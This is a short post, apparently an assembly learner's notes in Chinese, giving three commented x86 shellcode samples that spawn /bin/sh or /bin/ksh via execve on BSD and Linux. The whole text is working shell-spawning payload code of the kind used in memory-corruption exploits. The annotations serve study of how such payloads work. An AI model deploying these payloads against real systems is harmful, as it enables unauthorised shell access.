Shellcode in Assembly
今天学汇编的时候学着写了几个Shellcode(运行/bin/sh)。
在BSD UNIX下运行的shellcode,执行/bin/sh
/*
* Shellcode: execve /bin/sh for BSD UNIX
* by matthew (matthew@arbornet.org)
* Apr 06 2003
*
* Tested on NetBSD1.6 FreeBSD4.7 OpenBSD3.2
*
* __@
* _ \<_
* (_)/(_) matthew@arbornet.org
*
*/
/*
 * Layout: the path string sits after the code and is reached with the
 * jmp/call/pop pattern -- `call step2` pushes the address of the byte
 * that follows it, which is the first byte of "/bin/sh", and `popl %esi`
 * recovers that address. No absolute address is embedded, so the bytes
 * are position-independent.
 *
 * Register roles: %esi = path string, %ebx = argv, %eax = 0 and later
 * the syscall number.
 */
.global _start
_start:
jmp step1                         /* jump forward so `call` can push the string address */
step2:
popl %esi                         /* %esi = address of "/bin/sh" (the return address pushed by `call step2`) */
xorl %eax, %eax                   /* %eax = 0 */
movb %al, 0x07(%esi)              /* byte 7 (the one after 's') = 0: NUL-terminate the path */
movl %esi, 0x08(%esi)             /* argv[0] = path pointer; offset 8 lies just past the 8 bytes
                                     `.string` emits, i.e. in whatever memory follows the listing */
pushl %eax                        /* envp = NULL */
leal 0x08(%esi), %ebx             /* %ebx = &argv (the pointer stored above); argv[1] at offset
                                     12 is never written here, so its terminator depends on
                                     whatever bytes follow in memory */
pushl %ebx                        /* argv */
pushl %esi                        /* path */
pushl %eax                        /* BSD i386 syscall convention: arguments are read from the
                                     stack above this slot, which stands in for a return address */
movb $0x3b, %al                   /* %eax = 59 = SYS_execve on NetBSD/FreeBSD/OpenBSD i386 */
int $0x80                         /* execve("/bin/sh", argv, NULL); if it returns, execution
                                     falls into step1 and repeats the call */
step1:
call step2                        /* pushes the address of the string below, then enters step2 */
.string "/bin/sh"                 /* 7 characters plus the NUL `.string` appends */
在BSD UNIX下运行的shellcode,执行/bin/ksh
/*
* BSD shellcode
* execve /bin/ksh for NetBSD, FreeBSD, OpenBSD
* by matthew
*
* Apr 12 2003
*
* __@
* _ \<_
* (_)/(_) matthew@arbornet.org
*
*/
/*
 * Builds "/bin/ksh" on the stack instead of placing a string after the
 * code: the zero pushed first is the terminator, and the two immediates
 * are the path bytes in little-endian order (2f 62 69 6e 2f 6b 73 68).
 *
 * Register roles: %eax = 0 and later the syscall number, %ebx = path,
 * %ecx = argv. As in the BSD i386 convention, the arguments are passed
 * on the stack, not in registers.
 */
.global _start
_start:
xorl %eax, %eax                   /* %eax = 0 */
pushl %eax                        /* NUL terminator for the path */
pushl $0x68736b2f                 /* "/ksh" */
pushl $0x6e69622f                 /* "/bin" -> the stack now reads "/bin/ksh\0" */
movl %esp, %ebx                   /* %ebx = path */
pushl %eax                        /* argv[1] = NULL */
pushl %ebx                        /* argv[0] = path */
movl %esp, %ecx                   /* %ecx = argv */
pushl %eax                        /* envp = NULL */
pushl %ecx                        /* argv */
pushl %ebx                        /* path */
pushl %eax                        /* placeholder for the return-address slot the BSD i386
                                     syscall convention expects below the arguments */
movb $0x3b, %al                   /* %eax = 59 = SYS_execve */
int $0x80                         /* execve(path, argv, NULL); nothing follows if it returns */
在Linux上运行的shellcode,执行/bin/sh
/*
* Shellcode for linux
* execve /bin/sh
* by matthew
* Apr 12 2003
*
* __@
* _ \<_
* (_)/(_) matthew@arbornet.org
*
*/
/*
 * Linux i386 variant: same stack-built path as the BSD version, but the
 * arguments travel in registers (%ebx, %ecx, %edx) rather than on the
 * stack, and the syscall number differs.
 *
 * Register roles: %eax = 0 and later the syscall number, %ebx = path,
 * %ecx = argv, %edx = envp.
 */
.global _start
_start:
xorl %eax, %eax                   /* %eax = 0 */
pushl %eax                        /* NUL terminator for the path */
pushl $0x68732f6e                 /* "n/sh" */
pushl $0x69622f2f                 /* "//bi" -> "//bin/sh\0"; the doubled slash pads the path to
                                     exactly two 32-bit words */
movl %esp, %ebx                   /* %ebx = path (arg 1) */
pushl %eax                        /* argv[1] = NULL */
pushl %ebx                        /* argv[0] = path */
movl %esp, %ecx                   /* %ecx = argv (arg 2) */
movl %eax, %edx                   /* %edx = envp = NULL (arg 3) */
movb $0xb, %al                    /* %eax = 11 = execve on i386 Linux */
int $0x80                         /* execve("//bin/sh", argv, NULL); nothing follows if it returns */